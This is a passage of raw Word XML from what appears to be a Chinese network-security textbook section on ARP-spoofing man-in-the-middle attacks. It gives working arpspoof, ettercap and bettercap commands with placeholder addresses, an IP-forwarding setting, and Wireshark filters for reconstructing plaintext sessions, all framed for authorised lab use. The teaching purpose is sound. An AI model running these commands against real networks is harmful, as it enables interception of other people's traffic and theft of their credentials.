        <w:t xml:space="preserve"> Note over G: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">缓存被毒化&lt;br/&gt;受害者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射为攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> V-&gt;&gt;A: IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据包（目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器）&lt;br/&gt;二层目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over A: Wireshark / tshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">嗅探明文内容&lt;br/&gt;或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流重组</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A-&gt;&gt;G: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发至网关（开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> G-&gt;&gt;S: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正常路由</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> S-&gt;&gt;G: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> G-&gt;&gt;A: IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据包（目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">受害者）&lt;br/&gt;二层目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A-&gt;&gt;V: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发至受害者</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">要点在于，攻击机必须开启</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">转发（IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Forwarding），否则毒化后的流量到达攻击机后即被丢弃，形成拒绝服务而非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MITM。在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上，开启转发的命令为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sysctl net.ipv4.ip_forward=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或写入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。需要注意的是，有些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ettercap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arpspoof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）会自动管理转发；手动使用低层工具时则需显式启用。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="113"/>
    <w:bookmarkStart w:id="114" w:name="欺骗工具与-wireshark-观察"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗工具与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">观察</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在授权实验环境中，ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗的实现工具有多种选择。以下展示的是通用语法（工具名/路径/参数名真实，但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP/MAC/接口环境值用占位符标记）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">arpspoof（dsniff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">工具包）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 欺骗受害者：声称攻击者是网关</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> arpspoof </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INTERFACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VICTIM_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GATEWAY_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 欺骗网关：声称攻击者是受害者（另开终端）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> arpspoof </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">INTERFACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GATEWAY_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VICTIM_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">集成方式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> arp:remote /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GATEWAY_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">VICTIM_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">//</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bettercap（现代替代方案）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bettercap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-eval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"set arp.spoof.targets &lt;VICTIM_IP&gt;; arp.spoof on; net.sniff on"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上述所有命令中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;INTERFACE&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VICTIM_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;GATEWAY_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">需替换为实际实验环境值，因靶机配置而异。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗进行中，在攻击机上启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即可观察改道流量。推荐使用的显示过滤器：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅查看与受害者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关的流量</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip.addr == &lt;VICTIM_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">跟踪</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明文请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文（验证欺骗应答在持续发送）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">arp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">排除攻击机自身管理流量（根据实验调整）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ip.addr == &lt;VICTIM_IP&gt; &amp;&amp; !ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“Follow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Stream”（跟踪</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流）功能，可以对受害者发起的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Telnet、FTP、HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等明文协议的会话进行完整重组——这正是第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节强调的明文协议凭据暴露风险的实战体现：6.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节讲的是“在广播/混杂模式下被动窃听”，本节升级为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
